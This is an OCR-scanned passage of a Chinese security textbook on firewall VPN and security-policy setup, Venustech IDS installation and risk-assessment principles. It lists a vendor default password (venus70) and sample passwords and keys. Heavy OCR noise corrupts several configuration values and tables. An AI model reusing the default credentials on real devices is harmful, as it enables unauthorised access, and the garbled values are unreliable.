以 移动 办 公用 户 使 用 Windows 7 操作 系统 通过 L2TP over IPSec 接 入 总 部 VPN 为 
例 ， 如 图 6-44 所 示 。 


oof 
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新 建 源 NAT 策 略 Pee 
号 能 介绍 ] 
名 称 example1 * 
描述 
源 安全 区 域 trust 于 G 
目的 类 型 © 目的 安全 区 域 出 接口 
untrust ii 

转换 前 

源 地 址 国 10.3.0.0/24 

目的 地 址 @ 请 选择 或 输入 IP 地 址 及 撞 码 或 MAC 地 址 

服务 请 选择 服务 Yet 
动作 © NAT 转 换 不 做 NAT 转 换 
转换 后 

源 地 址 国 地 址 池 中 的 地 址 ”(®@) 出 接口 地 址 

确定 取消 


图 6-43 配置 NAT 策略 
LAC 客户 端 通过 Intemet 连接 到 公司 总 部 的 LNS 侧 。 要 求 由 出 差 员 工 (LAC Client) 
直接 向 LNS 发 起 连接 请 求 ， 与 LNS 的 通信 数据 通过 隧道 Tunnel 传输 。 先 使 用 L2TP 封 
装 第 二 层 数 据 ， 对 身份 认证 ; 再 使 用 IPSec 对 数据 进行 加 密 ， 有 具体 数据 规划 如 表 6-1 


所 示 。 
Trust Untrust 
GE0/0/3 GE0/0/1 
10.1.1.1/24 Ss 1.1.1.2/29 DJ 
Firewall LAC Client 
(LNS) 3.3.3.3/24 


Server 


图 6-44 配置 客户 端 使 用 Windows7 系统 自 带 软件 通过 L2TP over IPSec 接 入 总 部 组 网 
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表 6-1 数据 规划 
项 目 E 据 
组 名 : default 
L2TP 配 置 用 户 名 称 : vpdnuser 
用 户 密码 : Hello123 
PFH: Admin@123 
LNS IPSec 配置 本 端 ID: IP Hit 
Xfm ID: BEE AERO ig ID 
10.1.2.2~10.1.2.100 
用 户 地 址 池 | 请 确保 总 部 设备 和 地 址 池 中 地 址 路 由 可 达 。 路 由 下 一 跳 指 向 防火 墙 
连接 总 部 内 网 的 接口 GE0/0/3。 
了 地址 3.3.3.3/24 
认证 名 称 : 
LTP 配置 用 请 认 证 名 条 vpdnuser 
LAC Client 用 户 认证 密码 : Hellol23 
Ipsec 配置 预 共享 密 钥 : Admin@123 
对 端 地 址 : 1.1.1.2/29 
1. 配置 接口 


(1) 配置 外 网 接口 
选择 “网 络 一 接口 ?”， 单 击 GE0/0/1 对 应 的 编辑 图 标 ， 按 照 图 6-45 所 示 进 行 配置 。 


© 5P DHCP PPPoE 


1.1.1.2/255.255.255.248 一 行 一 条 记录 ， 
输入 格式 为 “1.1.1.11255.255.255.0" 
BA “1.1.1.11240 


图 6-45 配置 外 网 接口 参数 


(2) 配置 内 网 接口 
选择 “网 络 一 接口 ”， 单 击 GE0/0/3 对 应 的 编辑 图 标 ， 按 照 图 6-46 所 示 进 行 配置 。 


Ra 
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2. 配置 安全 策略 


(1) 协议 


© 静态 IP 


10.1.1.1/255.255.255.0 


PPPoE 


一 行 一 条 记录 ， 


输入 格式 为 “1.1.1.1/255.255.255.0" 
或 者 “1.1.1.1/24"。 


图 6-46 配置 内 网 接口 参数 


选择 “策略 一 安全 策略 一 安全 策略 ”， 单 击 “ 新 建 ” 按钮， 按照 表 6-3~6-5 所 示 参 数 ， 


分 别 建立 4 个 策略 。 


表 6-2 允许 总 部 服务 器 范围 外 网 策略 


a K 


源 安全 区 域 


目的 安全 区 域 
源 地 址 /地 区 
动作 


表 6-4 人 允许 LAC Client 与 防火 墙 通信 


policy1 
trust 
untrust 
10.1.1.0/24 


名 称 
源 安全 区 域 
目的 安全 区 域 
源 地 址 /地 区 
动作 


表 6-3 人 允许 LAC Client 访问 总 部 服务 器 


policy2 
untrust 
trust 
10.1.1.0/24 


允许 


ROS 允许 防火 墙 与 LAC Client 通信 


名 K policy3 名 K policy4 
源 安全 区 域 untrust 源 安 全 区 域 local 
目的 安全 区 域 local 目的 安全 区 域 untrust 
源 地 址 /地 区 1.1.1.2/32 动作 允许 
动作 允许 
3. 配置 L2TP 用 户 
选择 “对 象 一 用 户 一 用 户 /组 ” 选中 default 认证 域 ， 在 “成 员 管 理 ” 中 ， 单 击 “ 新 


建 ” 按 钮 ， 选 择 “ 新 建 用 户 ?， 按 如 下 参数 配置 ， 出 差 员 工 “vpdnuser” 
码 为 Hello123。 本 例 以 “/default” 组 为 例 ， 实 际 应 用 中 可 以 把 用 户 放 置 在 任意 组 中 。 
4. 配置 L2TP over IPSec 
选择 “网 络 一 L2TP over IPSec”， 按 照 图 6-47~6-49 所 示 进 行 配置 。 


4 用 户 信息 ， 密 
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策略 名 称 

本 庙 接 口 图 

本 端 接口 IP 地 址 @ 
对 庙 地 址 


认证 方式 @ © 预 共 享 密 钥 
预 共享 密 外 aeeeesesese 
EDO IP 地 址 

对 端 D 国 接受 任意 对 端 ID 


图 6-47 基本 配置 


me。 anene e 


地 址 池 起 柏 信 10122 
地 址 池 结 柬 IP 10.1.2.100 


e mlm 
S AERA o 
地 址 类 型 © pw IPv6 


图 6-48 ”拨号 用 户 配 置 


3 特 加 密 的 数据 六 
地 址 类 型 © Pa O Pe 
i 
D Set 目的 地 址 be Fao RSO aF 编辑 
BuU any any any any any IWE 


新 建 竺 加密 的 数据 流 


REARS 


和 安全 提议 
接受 对 济 提 议 国 


图 6-49 ” 待 加 密 数 据 流 配 置 


5. 配置 LAC Client 的 拨号 参数 

首先 确保 IPSec 服务 已 开启 ， 进 入 “控制 面板 一 网 络 和 共享 中 心 ” 单 击 “ 设 置 新 的 
连接 或 网 络 ”依次 选择 “连接 到 工作 区 一 使 用 我 的 Internet 连接 (VPN)”, 然后 按 图 6-50 
和 图 6-51 所 示 设 置地 址 及 用 户 名 密码 。 


| Go E 
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键入 要 连接 的 Internet 地 址 


网 络 管理 员 可 提供 此 地 址 。 

Internet 地 址 0: 1.1.1.2 

目标 名 称 (E): VPN 连接 
使 用 智能 卡 (S) 


@ D 允许 其 他 人 使 用 此 连接 (A) 
这 个 选项 允许 可 以 访问 这 台 计 算 机 的 人 使 用 此 连接 。 


回 现 在 不 连接 ; 仅 进行 设置 以 便 笛 后 连接 (D) 


用 户 各 (U): vpdnuser 


ZRP): Hello123 


V 显示 字符 (9) 
团 记 住 此 密码 (R) 


域 呵 选 )(D): 


6-51 设置 连接 VPN 的 用 户 名 和 密码 


完成 上 述 设置 后 ， 右 击 “VPN 连接 ” 选择 属性 ， 进 行 最 后 设置 ， 如 图 6-52 所 示 。 
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[常规 [am | 安全 | 网 络 | [er | 
ven 类 型 (I © 使 用 预 共享 的 密 钥 作 身份 验证 C) 
使 用 IPsec 的 第 2 层 隘 道 协议 0.2TP/IPSec) ~ if 一 一 
POE A SEAT a 
高 级 设置 G) 一 一 一 一 一 > 
pide m - D 将 证 书 用 于 身份 验证 C) 
可 选 加 密 CR Mee the] Le) z 验证 服务 器 证 书 的 “名 称 ” 和 “用 法 ”属性 ) 
身份 验证 
O 使 用 可 扩展 的 身份 验证 协议 AP) E) 
REW 
© 允许 使 用 这 些 协议 P) üe ][ mă ] 


poapEn Windows 登录 名 称 和 密码 及 
或 ， 如 果 有 ) A) 


E 
图 6-52 VPN 连接 属性 设置 


6. 结果 验证 

最 后 连接 VPN， 并 在 防火 墙 上 查看 到 IPSec 隧道 监控 信息 和 L2TP 通道 监控 信息 。 
6.2.3.4 部署 安全 功能 

以 配置 安全 策略 为 例 ， 如 图 6-53 所 示 。 假 定 某 企 业 在 网 络 边界 处 部 署 了 NGFW 作 
为 安全 网 关 。 企 业 根据 员工 级 别 和 职能 不 同 划分 了 三 种 用 户 : 高 层 管 理 者 、 市 场 员工 、 
研发 员工 ， 他 们 能 够 访问 Intemet 的 权限 不 同 。 有 具体 如 下 : 高 层 管理 者 可 以 自由 访问 
Internet; 市 场 员工 能 够 访问 Intemet， 但 不 能 玩 游戏 ， 观 看 网 络 视频 ; 研发 员工 不 能 访问 
Intemet。 企 业 还 希望 对 通过 NGFW 的 流量 进行 反 病毒 和 入 侵 防 御 检 测 ， 保 护 内 部 网 络 
安全 。 


e Trust Untrust 


研发 员工 


图 6-53 配置 安全 策略 组 网 


Ca 
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1. 网 络 基本 参数 配置 
选择 “网 络 一 接口 ” 单 击 GE1/0/1 对 应 的 编辑 图 标 ， 按 表 6-6 参数 配置 。 


#66 GE1/0/1 参数 配置 


下 地 址 1111 
BEFAL 255.255.255.0 
安全 区 域 untrust 


按 表 6-7 配置 GE1/0/3 接口 。 


表 6-7 GE1/0/3 参数 配置 


TP Sh bt: 10.3.0.1 


网 络 掩 码 | 255.255.255.252 
安全 区 域 trust 
2. 配置 高 层 管理 者 的 安全 策略 
选择 “策略 一 安全 策略 一 安全 策略 ”， 单 击 “ 新 建 ” 按 钮 ， 按 照 表 6-8 的 参数 配置 高 
层 管理 者 的 安全 策略 。 


R68 配置 高 层 管理 者 的 安全 策略 


名 称 policy_sec_management 
源 安全 区 域 trust 
目的 安全 区 域 untrust 
用 户 management 
动作 允许 
反 病 毒 default 
入 侵 防御 default 


3. 配置 市 场 员工 的 安全 策略 
选择 “策略 一 安全 策略 一 安全 策略 ”， 单 击 “ 新 建 ”按钮 ， 按 照 表 6-9 和 6-10 的 参 
数 配 置 市 场 员 工 的 安全 策略 1 和 安全 策略 2。 


表 6-9 配置 市 场 员工 的 安全 策略 1 


名 称 policy_sec_marketing 1 
源 安全 区 域 trust 
目的 安全 区 域 untrust 
应 用 游戏 、 媒 体 共享 
用 户 marketing 
动作 禁止 
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R610 配置 市 场 员工 的 安全 策略 2 


名 称 policy_sec_marketing 2 

源 安 全 区 域 trust 

目的 安全 区 域 untrust 

应 用 any 

用 户 marketing 

动作 允许 

反 病 毒 default 

入 侵 防 御 default 


4. 配置 研发 员工 的 安全 策略 
选择 “策略 一 安全 策略 一 安全 策略 ”， 单 击 “ 新 建 ” 按 钮 ， 按 照 表 6-11 的 参数 配置 
研发 员工 的 安全 策略 。 


表 6-11 配置 研发 员工 的 安全 策略 


名 称 policy_sec_research 
源 安 全 区 域 trust 
目的 安全 区 域 untrust 
用 户 research 
动作 禁止 


© ete ee E 够 不 受 限 制 的 访问 Intemet， 如 果 是 则 证 明 高 层 管理 者 的 
安全 策略 配置 成 功 。 

© 验证 市 场 员工 的 用 户 是 否 能 够 访问 Internet, 而 且 访问 Internet 时 不 能 使 用 NGFW 
定义 的 游戏 和 媒体 共享 应 用 。 如 果 是 则 证 明 市 场 员工 的 安全 策略 配置 成 功 。 

@ 验证 研发 员工 用 户 是 否 不 能 访问 Intemet。 如 果 是 则 证 明 研 发 员工 的 安全 策略 配 
置 成 功 。 

@ 选择 “监控 一 日 志 一 策略 命中 日 志 ” 分 别 查看 高 层 管理 者 、 市 场 员 工 、 研 发 员 
工 是 否 命中 正确 的 安全 策略 。 

© 选择 “监控 一 日 志 一 威胁 日 志 ”， 查 看 流量 是 否 会 被 反 病 毒 或 入 侵 防 御 配 置 文件 
阻 断 。 


6.2.4 天 阅 人 侵 检 测 管 理 系统 (IDS) 


6.2.4.1 简介 

天 阅 入 侵 检 测 与 管理 系统 (IDS) 是 启明 星辰 自主 研发 的 入 侵 检 测 类 安全 产品 ， 其 
主要 作用 是 帮助 用 户 量化 、 定 位 来 自 内 外 网 络 的 威胁 情况 ， 提 供 有 针对 性 的 指导 措施 和 
安全 决策 依据 ， 并 能 够 对 网 络 安 全 整体 水 平 进行 效果 评估 ， 天 阅 入 侵 检 测 与 管理 系统 


Es E 


Hp 
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DS) 采用 了 融合 多 种 分 析 方法 的 新 一 代入 侵 检 测 技术 ， 配 合 经 过 安全 优化 的 高 性 能 硬 
件 平 台 ， 坚 持 “ 全 面 检测 、 有 效 呈 现 ” 的 产品 核心 价值 取向 ， 可 以 依照 用 户 定制 的 策略 ， 
准确 分 析 、 报告 网 络 中 正在 发 生 的 各 种 异常 事件 和 攻击 行为 , 实现 对 网 络 的 “全 面 检测 ”， 
并 通过 实时 的 报警 信息 和 多 种 格式 报表 ， 为 用 户 提供 翔实 、 可 操作 的 安全 建议 ， 帮 助 用 
户 完善 安全 保障 措施 ， 确 保 将 信息 “有 效 呈 现 ” 给 用 户 。 

同时 ， 天 阅 入 侵 检测 与 管理 系统 支持 扩展 无 线 安全 模块 ， 可 准确 识别 各 类 无 线 安全 
攻击 事件 ， 按 不 同安 全 级 别 实时 告警 ， 并 据 此 生成 多 种 统计 报表 ， 并 提供 有 线 、 无 线 网 
络 攻击 检测 整体 解决 方案 。 
6.2.4.2 ”软件 安装 

1. 安装 数据 库 

主要 安装 天 阅 入 侵 检测 与 管理 系统 ， 安 装 该 系统 之 前 ， 主 机 需 安装 SQL Server 2005 
Express edition 数据 库 , 同时 , 在 安装 数据 库 的 过 程 中 , 在 选择 实例 名 中 选择 “默认 实例 ”， 
在 选择 服务 账号 中 选择 使 用 内 置 系统 账户 ， 本 地 系统 ， 在 身份 验证 中 选择 混合 模式 ， 并 
牢记 用 户 名 为 sa 对 应 的 密码 。 

2. 安装 天 阅 入 侵 检测 与 管理 系统 

在 进行 安装 天 阅 入 侵 检 测 与 管理 系统 的 过 程 中 ， 需 要 建立 数据 库 并 导入 ， 由 于 使 用 
了 SQL Server 数据 库 , 所 以 先 在 SQL Server 界面 上 配置 好 数据 库 服 务 嚣 名称、 数据库 名 
称 、 数 据 库 文件 存储 目录 、 数 据 库 模板 文件 的 目录 (Access 模板 ， 一 般 在 安装 天 阅 系 统 
的 目录 下 )、ODBC 数据 源 名 称 ， 如 图 6-54 所 示 。 单 击 “ 确 定 ” 按 钮 即 可 。 


D 业务 数据 导入 工具 


Microsoft SQL Server | Oracle | 
SqlServer 参数 
服务 器 : haoor | 
数据 库 名 称 : ras 20130626 0° = 
用 户 各 : jf. | 


[数据 源 
Access 文 件 ff-mab) 训 览 
[D:\Program Files\Venustech\IDS_web\DataCenter 


一 建立 0DBC 数 据 源 


数据 源 名 称 ”|IDSSQL_web_sqlSvr 


Cw |] we | 


图 6-54 ”数据库 导 入 
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导入 成 功 后 ， 将 继续 对 数据 库 进行 配置 ， 服 务 器 的 实例 名 称 修改 为 安装 数据 库 PC 
的 他 地 址 ， 如 图 6-55 所 示 。 


3 e C ile 
182. 168. 13. ‘T6\SQLEXPRESS E 


图 6-55 数据 库 配置 


然后 进行 服务 与 端口 的 配置 ， 在 本 机 IPv4 中 填 入 本 机 的 IP 地 址 ， 若 想 配置 IPv6 地 
址 ， 则 在 本 机 IPv6 地 址 处 按照 地 址 规范 填写 IPv6 地 址 ， 如 图 6-56 所 示 。 


系统 设置 [x] 


192. 168. 13.76 | 


图 6-56 服务 与 端口 配置 
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最 后 按照 默认 步骤 可 完成 系统 安装 。 
6.2.4.3 引擎 安装 


引擎 利用 超级 终端 进行 基本 设置 ， 超 级 终端 端口 设置 为 : 每 秒 位 数 B) 项 选择 
“9600”， 其 他 速率 无 效 ， 数据 位 CD) 项 选择 “8”; 奇偶 校 验 P) 项 选择 “无 ” 停止 
位 “S” 项 选择 “1”;， 数据 流 控制 CP) 项 选择 “硬件 ”。 配 置 好 超级 终端 以 后 ， 利 用 默 


认 登 录 密 码 进入 超级 终端 界面 ， 如 图 6-57 所 示 。 


RHO 编辑 EE) SEW FUO 传送 [I) HW 


Oe Ssg OOF 


选择 一 

配置 选 
T 
2. 
3. 
4. 
5: 
6. 
T: 
8. y 

辅助 
9 


Gai 
10. TRACEROUTEM ix 

11. 显示 ETH@ MAC 地 址 
AAM: P 

12. 恢复 引擎 出 三 参数 
13. 恢复 初始 应 用 程序 
USB 开 级 


出 选项 ; 
15. 退出 串口 配置 程序 


venus: 


图 6-57 超级 终端 


并 对 串口 登录 口令 、IP 地 址 / 子 网 掩 码 和 路 由 进行 更 改 , 重 置 引擎 认证 密 钥 后 , 退出 


串口 配置 程序 ， 完 成 基本 配置 。 


第 一 次 安装 应 该 配置 引擎 通信 P 地 址 ， 出 三 默认 地 址 为 : 192.168.0.200; 如 果 控 制 
中 心 和 引擎 是 跨 网 段 控 制 ， 需 要 使 用 “更 改 路 由 配置 ”来 设置 相关 路 由 信息 。 配 置 完毕 
以 后 可 以 使 用 辅助 选项 中 的 “PING 测试 ”和 “TRACEROUTE 测试 ”来 检查 是 否 可 以 和 
网 络 连通 。 当 重新 安装 了 控制 中 心 或 更 改 了 控制 中 心 的 主机 地 址 ， 需 要 使 用 “ 重 置 引擎 


认证 密 钥 ”来 清除 原来 的 认证 信息 保证 和 新 的 控制 中 心 建立 认证 关系 。 


检测 引擎 在 实际 网 络 中 通常 通过 镜像 方式 接 入 的 位 置 ， 网络 边 界 处 交换 机 、 


务 器 区 域 出 口 的 交换 机 或 者 核心 交换 机 。 


HR 


点 服 


检测 引擎 接 入 网 络 的 原则 : 保证 实际 网 络 流量 小 于 或 接近 检测 引擎 的 处 理 能 力 、 接 


入 点 能 够 覆盖 到 被 保护 的 机 器 。 
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6.2.4.4 BARE 

(1) 建立 管理 员 用 户 

在 浏览 器 中 输入 地 址 (该 地 址 为 控制 中 心服 务 器 地 址 〉 如: https: 
//192.168.12.188/LoginIndex.action， 利 用 用 户 管理 员 admin 登录 (7.0 版 本 缺 省 口令 为 : 
venus70)， 然 后 为 天 阅 系 统 添加 一 个 管理 员 用 户 ， 并 设置 可 以 登录 。 

(2) 添加 引擎 

打开 浏览 器 ， 在 url 中 输入 地 址 如 : https: //192.168.12.188/LoginIndex.action， 然 后 
输入 用 户 名 和 密码 〈7.0 版 本 默认 用 户 名 : adm， 密 码 : venus70) 登录 成 功 ， 选 择 常用 
配置 一 组 件 管理 一 引擎 配置 ， 单 击 “ 新 建 ”按钮 ， 进 入 如 图 6-58 所 示 新 建 本 地 引擎 界面 
添加 引擎 。 


E 新 建 本 地 引擎 


引擎 类 型 IDS 引 擎 (5060 及 以 上 ) 图 
引擎 名 称 
引擎 P 


引擎 说 明 


提交 取消 
图 6-58 新建 本 地 引擎 


(3) 导入 引擎 授权 
正式 销售 的 产品 ， 在 连接 上 引擎 后 要 导入 厂家 提供 的 引擎 的 授权 文件 或 授权 序列 号 
一般 放 在 产品 包装 箱 的 软件 盒 中 )。 

(4) 事件 库 更 新 

为 了 保证 具备 最 新 攻击 的 检测 能 力 ， 需 要 进行 事件 更 新 ， 有 具体 操作 如 下 : 在 URL 
中 输入 地 址 进入 天 阅 入 侵 检 测 与 管理 系统 V7.0 (默认 用 户 名 : adm， 密 码 : venus70) 一 
常用 配置 一 升级 管理 配置 ， 按 照 图 6-59 配置 ， 单 击 “ 提 交 ” 按 钮 。 可 以 从 启明 星辰 网 站 
下 载 事 件 更 新 包 进行 自动 升级 ， 完 成 事件 库 更 新 。 

(5) 策略 定制 和 下 发 

最 后 ， 请 根据 网 络 状况 ， 选 择 一 个 合适 的 策略 集 下 发 给 所 属 引擎 ， 也 可 以 在 主 控 直 
接 下 发 策略 集 给 子 控 和 子 控 的 引擎 。 如 果 是 第 一 次 使 用 天 阅 入 侵 检 测 与 管理 系统 V7.0 
控制 中 心 ， 最 好 自行 衍生 一 个 用 户 自 定义 策略 集 ， 推 荐 使 用 策略 向 导 模 式 ， 方 法 如 下 : 
在 常用 配置 一 策略 管理 一 策略 集 一 单 击 “ 新 建 ” 按钮 ， 进 入 如 图 6-60 所 示 新 建 策略 界面 


Ga 
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新 建 策略 集 。 


D 事件 库 升 级 


当前 事件 库 版 本 
D 事件 库 手动 升级 

立即 升级 

事件 库 升 级 包 


运行 状态 


O 事件 库 自动 升级 
D 升级 日 志 
D 事件 库 更 新 配置 


2013-08-09 REFE 


图 6-59 事件 库 升 级 


E 新 建 策略 集 


名 称 all * 


四 不 能 为 空 ， 字 符 数 不 能 超过 50 


全 策略 
说 明 


图 6-60 WERKE 


le 
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在 如 图 6-61 所 示 界 面 中 ， 可 选择 所 有 检测 事件 ， 也 可 以 根据 您 需要 选择 检测 事件 ， 
单 击 “提交 ”按钮 生成 一 个 初始 策略 集 。 在 组 件 管理 一 组 件 状 态 管理 一 选择 需要 应 用 到 
的 网 络 引擎 ， 单 击 下 发 图 标 进行 策略 下 发 和 应 用 。 通 过 威胁 展示 一 实时 事件 页 面 可 以 看 
到 相应 的 报警 信息 。 


|5 选择 事件 


| 
| = = 共 3100 条 
| 


口 事件 名 称 


D ARP(4) 

Bb AUTH(3) 

b DNS(19) 

D FINGER(21) 
D FTP(72) 

> HTTP(1483) 
D ICMP(27) 
D IGMP(1) 


me 


k 


1o 加 | 加 


图 6-61 选择 事件 


(6) 设置 数据 库 自动 维护 

设置 数据 库 自动 维护 可 以 防止 日 志 量 过 大 造成 系统 维护 困难 。 数 据 库 维护 工具 可 实 
现 数 据 库 日 志 的 自动 删除 、 自 动 备份 、 手 动 删除 和 手动 备份 的 工作 。 选 择 程序 一 启明 星 
辰 一 天 阅 -Web 一 数据 库 维护 ， 进 入 到 数据 库 维护 界面 后 数据 库 维护 工具 进行 自动 维护 设 
署 、 手 动 维护 、 导 入 数据 、SQL 快速 维护 和 退出 。 

在 这 里 用 户 可 以 设置 数据 库 的 自动 备份 的 时 间 (自动 备份 后 会 删除 数据 库 中 一 些 陈 
旧 的 数据 )， 到 达 用 户 设 置 时 间 时 系统 就 会 自动 调用 数据 库 维 护 程 序 来 对 数据 库 进 行 
维护 。 

(7) 多 级 管理 设置 

如 果 要 进行 多 级 的 管理 与 控制 ， 请 将 下 级 控制 中 心 添加 到 本 级 控制 中 心 ， 在 总 部 控 
制 中 心 的 常用 配置 一 组 件 管理 一 子 控 配 置 一 单 击 “ 新 建 ”按钮 ， 进 入 图 6-62 新 建 直属 于 
控 界 面 添加 直属 子 控 。 


om) 
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子 控 名 称 * 
FIP * 
子 控 说 明 


图 6-62 新 建 直属 子 控 


注意 填 好 子 控 的 P 地 址 和 子 控 名 称 。 用 类 似 的 方法 可 以 将 多 个 其 他 的 控制 中 心 设置 
为 自己 的 子 控制 中 心 。 添 加 子 控 完成 后 ， 系 统管 理 结构 就 配置 完成 了 ， 在 主页 一 拓扑 图 
中 可 以 看 到 主 控 制 中 心 界面 。 全 部 配置 完成 后 ， 根 据 控制 中 心 管理 的 需要 ， 在 高 级 配 
置 一 系统 配置 一 级 联 控 制 可 以 设置 允许 上 级 连接 和 接收 并 应 用 上 级 控制 中 心 下 发 的 策略 
等 ， 如 图 6-63 所 示 。 


ASRE FARE AZRE 帮助 


| “检测 对 象 


cme] bake maka 。 ”代理 配置 。 PRE 


次 级 联 控制 


回 允许 上 级 连接 

本 级 控制 中 心 

回 接收 并 应 用 上 级 控制 中 心 下 发 的 策略 

回 接收 并 应 用 上 级 控制 中 心 下 发 的 事件 库 升 级 包 
回 接收 并 应 用 上 级 控制 中 心 下 发 的 引擎 升级 包 

回 接收 并 应 用 上 级 控制 中 心 下 发 的 控制 中 心 升级 包 


图 6-63 级 联 控制 


在 常用 配置 一 组 件 管理 一 子 控 配 置 ， 单 击 过 滤 图 标 对 进行 事件 过 滤 条 件 设置 。 这 里 
可 以 设置 上 级 控制 中 心 是 否 接收 下 级 控制 中 心事 件 上 报 。 
然后 青 在 常用 配置 一 组 件 管理 一 直属 子 控 管 理 ， 单 击 日 志 图 标 ， 这 里 可 以 设置 上 级 
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控制 中 心 是 否 接收 下 级 控制 中 心事 件 日 志 同 步 设置 。 

设置 完成 后 ， 您 就 可 以 在 一 个 主 控制 中 心 对 它 的 下 级 控制 中 心 进行 自 顶 向 下 的 管理 
和 控制 ， 下 级 控制 中 心 的 信息 就 可 以 自 底 向 上 的 传送 给 主 控制 中 心 ， 一 个 多 级 分 布 式 的 
管理 系统 就 这 样 工作 了 。 


6.3 ”网络 安全 风险 评估 实施 


6.3.1 基本 原则 与 流程 


6.3.1.1 基本 原则 

1. 标准 性 原则 

信息 系统 的 安全 风险 评估 ， 应 按照 GB/T 20984-2007 中 规定 的 评估 流程 进行 实施 ， 
包括 各 阶段 性 的 评估 工作 。 

2. 关键 业务 原则 

信息 安全 风险 评估 应 以 被 评估 组 织 的 关键 业务 作为 评估 工作 的 核心 ， 把 涉及 这 些 业 
务 的 相关 网 络 与 系统 ， 包 括 基础 网 络 、 业 务 网 络 、 应 用 基础 平台 、 业 务 应 用 平台 等 作为 
评估 的 重点 。 

3. 可 控 性 原则 

(1) 服务 可 控 性 

评估 方 应 事先 在 评估 工作 沟通 会 议 中 向 用 户 介绍 评估 服务 流程 ， 明 确 需要 得 到 被 评 
估 组 织 协作 的 工作 内 容 ， 确 保安 全 评估 服务 工作 的 顺利 进行 。 

(2) 人 员 与 信息 可 控 性 

所 有 参与 评估 的 人 员 应 签署 保密 协议 ， 以 保证 项 目 信 息 的 安全 ， 应 对 工作 过 程 数 据 
和 结果 数据 严格 管理 ， 未 经 授权 不 得 泄露 给 任何 单位 和 个 人 。 

(3) 过 程 可 控 性 

应 按照 项 目 管理 要 求 , 成 立项 目 实施 团队 , 项 目 组 长 负责 制 , 达到 项 目 过 程 的 可 控 。 

(4) 工具 可 控 性 

安全 评估 人 员 所 使 用 的 评估 工具 应 该 事先 通告 用 户 ， 并 在 项 目 实 施 前 获得 用 户 的 许 
可 ， 包 括 产品 本 身 、 测 试 策略 等 。 

4. 最 小 影响 原则 

对 于 在 线 业 务 系统 的 风险 评估 ， 应 采用 最 小 影响 原则 ， 即 首要 保障 业务 系统 的 稳定 
运行 ， 而 对 于 需要 进行 攻击 性 测试 的 工作 内 容 ， 需 与 用 户 沟通 并 进行 应 急 备 份 ， 同 时 选 
择 避 开业 务 的 高 峰 时 间 进 行 。 
6.3.1.2 ”基本 流程 

GB/T 20984—2007 规定 了 风险 评估 的 实施 流程 ,根据 流程 中 的 各 项 工作 内 容 ， 一 般 
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将 风险 评估 实施 划分 为 评估 准备 、 风 险要 素 识别 、 风 险 分 析 与 风险 处 置 四 个 阶段 。 其 中 ， 
评估 准备 阶段 工作 是 对 评估 实施 有 效 性 的 保证 ， 是 评估 工作 的 开始 ， 风 险要 素 识别 阶段 
工作 主要 是 对 评估 活动 中 的 各 类 关键 要 素 资产 、 威 胁 、 脆 弱 性 、 安 全 措施 进行 识别 与 赋 
值 ， 风 险 分 析 阶 段 工作 主要 是 对 识别 阶段 中 获得 的 各 类 信息 进行 关联 分 析 ， 并 计算 风险 
值 ， 风 险 处 置 建议 工作 主要 针对 评估 出 的 风险 ， 提 出 相应 的 处 置 建议 ， 以 及 按照 处 置 建 
议 实施 安全 加 固 后 进行 残余 风险 处 置 等 内 容 。 


6.3.2 ”识别 阶段 工作 


识别 阶段 是 风险 评估 工作 的 重要 工作 阶段 ， 对 组 织 和 信息 系统 中 资产 、 威 胁 、 脆 弱 
性 等 要 素 的 识别 ， 是 进行 信息 系统 安全 风险 分 析 的 前 提 。 
6.3.2.1 资产 识别 

资产 是 对 组 织 具 有 价值 的 信息 或 资源 , 是 安全 策略 保护 的 对 象 。 在 风险 评估 工作 中 ， 
风险 的 重要 因素 都 以 资产 为 中 心 ， 威 胁 、 脆 弱 性 以 及 风险 都 是 针对 资产 而 客观 存在 的 。 
威胁 利用 资产 自身 脆弱 性 ， 使 得 安全 事件 的 发 生成 为 可 能 ， 从 而 形成 了 安全 风险 。 这 些 
安全 事件 一 旦 发 生 ， 对 具体 资产 甚至 是 整个 信息 系统 都 将 造成 一 定 影响 ， 从 而 对 组 织 的 
利益 造成 影响 。 因 此 ， 资 产 是 风险 评估 的 重要 对 象 。 

不 同 价值 的 资产 受到 同等 程度 破坏 时 对 组 织造 成 的 影响 程度 不 同 。 资 产 价值 是 资产 
重要 程度 或 敏感 程度 的 表征 。 识 别 资产 并 评估 资产 价值 是 风险 评估 的 一 项 重要 内 容 。 

1. 资产 分 类 

在 一 个 组 织 中 ， 资 产 的 存在 形式 多 种 多 样 ， 不 同类 别 资产 具有 的 资产 价值 、 面 临 的 
威胁 、 拥 有 的 脆弱 性 、 可 采取 的 安全 措施 都 不 同 。 对 资产 进行 分 类 既 有 助 于 提高 资产 识 
别 的 效率 ， 又 有 利于 整体 的 风险 评估 。 

在 风险 评估 实施 中 ， 可 按照 《信息 安全 技术 信息 安全 风险 评估 规范 》(GB/T 20984 
一 2007) 中 资产 分 类 方法 ， 把 资产 分 为 硬件 、 软 件 、 数 据 、 服 务 、 人 员 以 及 其 他 6 大 类 。 
具体 资产 分 类 请 参考 《信息 安全 技术 信息 安全 风险 评估 规范 》(GB/T 20984-2007). 

2. 资产 调查 

资产 调查 是 识别 组 织 和 信息 系统 中 资产 的 重要 途径 。 资 产 调查 一 方面 应 识别 出 有 哪 
些 资产 ， 另 一 方面 要 识别 出 每 项 资产 自身 的 关键 属性 。 

业务 是 组 织 存在 的 必要 前 提 ， 信 息 系统 承载 业务 。 信 息 系 统 的 正常 运行 ， 保 证 业务 
的 正常 开展 ， 关 乎 组 织 的 利益 。 通 过 资产 调查 ， 应 确定 评估 对 象 中 包含 哪些 信息 系统 ， 
每 个 信息 系统 处 理 哪些 种 类 业务 ， 每 种 业务 包括 哪些 具体 业务 功能 ， 以 及 相关 业务 处 理 
的 流程 。 分 析 并 清楚 理解 各 种 业务 功能 和 流程 ， 有 利于 分 析 系 统 中 的 数据 流向 及 其 安全 
保证 要 求 。 

在 信息 系统 中 ， 业 务 处 理 表现 为 数据 处 理 和 服务 提供 ， 数 据 和 服务 都 是 组 织 的 信息 
资产 。 在 识别 各 种 业务 后 ， 应 进行 数据 处 理 和 服务 的 识别 ， 确 定 各 种 数据 和 服务 对 组 织 
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的 重要 性 ， 以 及 数据 和 服务 的 保密 性 、 完 整 性 、 可 用 性 、 抗 抵赖 性 等 安全 属性 ， 从 而 确 
定 哪些 是 关键 资产 。 

信息 系统 依赖 于 数据 和 服务 等 信息 资产 ， 而 信息 资产 又 依赖 于 支撑 和 保障 信息 系统 
运行 的 硬件 和 软件 资源 ， 即 系统 平台 ， 包 括 物理 环境 、 网 络 、 主 机 和 应 用 系统 等 ， 其 基 
